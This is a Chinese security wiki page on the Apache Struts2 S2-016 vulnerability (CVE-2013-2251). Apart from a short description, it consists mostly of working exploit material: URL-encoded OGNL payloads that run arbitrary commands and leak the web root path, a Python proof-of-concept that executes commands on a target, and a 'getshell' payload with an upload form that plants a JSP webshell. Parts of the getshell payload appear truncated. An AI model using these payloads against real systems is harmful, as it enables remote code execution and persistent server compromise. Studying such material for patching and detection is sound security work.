menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 160-Apache Struts chevron_right 013-(CVE-2013-2251)s2-016.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    013-(CVE-2013-2251)s2-016.md
    3.25 KB / 2021-07-17 00:01:26
        # (CVE-2013-2251)s2-016
    
    ## 一、漏洞简介
    
    DefaultActionMapper类支持以"action:"、"redirect:"、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令
    
    ## 二、漏洞影响
    
    Struts2.0.0 - Struts2.3.15
    
    ## 三、复现过程
    
    ![图片.png](images/fffbc3883ebe43508a9c2b1fa83f4c81.png)
    
    **任意命令执行**
    
    ```bash
    redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%7D
    
    ```
    
    ```bash
    ?redirect:
    ${#a=new java.lang.ProcessBuilder(new java.lang.String[]{"netstat","-an"}).start().getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#screen=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),#screen.println(#d),#screen.close()}
    
    ```
    
    **爆网站路径EXP**
    
    ```bash
     ?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
    
    ```
    
    **python执行任意命令poc**
    
    ```python
    import urllib2,sys,re
    
    def get(url, data):
        string = url + "?" + data
        req = urllib2.Request("%s"%string)
        response = urllib2.urlopen(req).read().strip()
        print strip(response)
    
    def strip(str):
       tmp = str.strip()
       blank_line=re.compile('\x00')
       tmp=blank_line.sub('',tmp)
       return tmp
    
    if __name__ == '__main__':
        url = sys.argv[1]
        cmd = sys.argv[2]
        cmd1 = sys.argv[3]
        attack="redirect:${%%23a%%3d(new%%20java.lang.ProcessBuilder(new%%20java.lang.String[]{'%s','%s'})).start(),%%23b%%3d%%23a.getInputStream(),%%23c%%3dnew%%20java.io.InputStreamReader(%%23b),%%23d%%3dnew%%20java.io.BufferedReader(%%23c),%%23e%%3dnew%%20char[50000],%%23d.read(%%23e),%%23matt%%3d%%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%%23matt.getWriter().println(%%23e),%%23matt.getWriter().flush(),%%23matt.getWriter().close()}"%(cmd,cmd1)
        get(url,attack)
    
    ```
    
    **GETSHELL EXP**
    
    ```bash
    ?redirect:${
    %23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
    %23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"),
    new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
    }&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%
    
    ```
    
    然后用以下代码写shell:
    
    ```html
    <form action="http://baidu.com/acdap/test.jsp?f=1.jsp&quot; method="post">
    <textarea >code</textarea>
    <input type=submit value="提交">
    </form>
    
    ```
    
    上传目录生成1.jsp
    
    
    
    links
    file_download